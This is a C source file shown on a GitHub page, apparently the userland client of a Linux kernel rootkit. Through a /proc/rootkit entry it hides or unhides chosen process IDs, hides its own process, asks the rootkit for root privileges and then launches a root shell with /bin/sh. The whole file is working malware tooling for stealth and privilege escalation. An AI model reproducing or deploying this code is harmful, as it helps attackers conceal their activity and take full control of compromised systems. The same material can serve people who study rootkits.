-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathclient.c
117 lines (94 loc) · 2.4 KB
/
client.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <math.h>
#define RTKIT_HIDEPID_CMD "hidepid"
#define RTKIT_UNHIDEPID_CMD "unhidepid"
#define RTKIT_GETROOTPERM_CMD "root"
#define RTKIT_PROCFS_ENTRYNAME "/proc/rootkit"
#define CURRENT_PROCESS 1
#define BUF_SIZE 16
#define pid_err "[ERROR] pid exceeds maximum limit\n"
#define OPTS_STR "+:h:s:c"
#define __err(msg,prnt_func,err_code) \
do{ \
prnt_func(msg); \
return err_code; \
}while(0)
#define usage_err(errmsg,opt) \
do{ \
printf(errmsg,opt); \
return -1; \
}while(0)
#define pid_hide_unhide(fd,pidvar,cmd_buf,cmd,curproc,errmsg) \
do{ \
if (curproc) \
{ \
pidvar = getpid(); \
} \
else \
{ \
pidvar = atoi(optarg); \
if ((pidvar > ((int)pow(2,22))) || (pidvar <= -1)) \
__err(errmsg pid_err,printf,-1); \
} \
memset(cmd_buf,0x0,BUF_SIZE); \
sprintf(cmd_buf,cmd"%d",pidvar); \
if (write(fd,cmd_buf,strlen(cmd_buf)) < 0) \
__err(errmsg,perror,-1); \
}while(0)
int main(int argc,char **argv)
{
char hidepid_cmd[BUF_SIZE];
char unhidepid_cmd[BUF_SIZE];
int opt,fd;
pid_t cur_pid,hidden_pid,unhidden_pid;
fd = open(RTKIT_PROCFS_ENTRYNAME,O_RDWR);
if (fd < 0)
__err("[__ERROR_1__]",perror,-1);
while((opt = getopt(argc,argv,OPTS_STR)) != -1)
{
switch (opt)
{
case 's':
//unhide given pid
pid_hide_unhide(fd,
unhidden_pid,
unhidepid_cmd,
RTKIT_UNHIDEPID_CMD,
!CURRENT_PROCESS,
"[__ERROR_2__]");
break;
case 'h':
//hide given pid
pid_hide_unhide(fd,
hidden_pid,
hidepid_cmd,
RTKIT_HIDEPID_CMD,
!CURRENT_PROCESS,
"[__ERROR_3__]");
break;
case 'c':
//hide current process id
pid_hide_unhide(fd,
cur_pid,
hidepid_cmd,
RTKIT_HIDEPID_CMD,
CURRENT_PROCESS,
"[__ERROR_4__]");
break;
case '?':
usage_err("[__ERROR__]unrecognized option [%c]\n",optopt);
break;
case ':':
usage_err("[__ERROR__]missing argument to [%c] option\n",optopt);
}
}
//get root privileges
if (write(fd,RTKIT_GETROOTPERM_CMD,strlen(RTKIT_GETROOTPERM_CMD)) < 0)
__err("[__ERROR_5__]",perror,-1);
system("/bin/sh");
}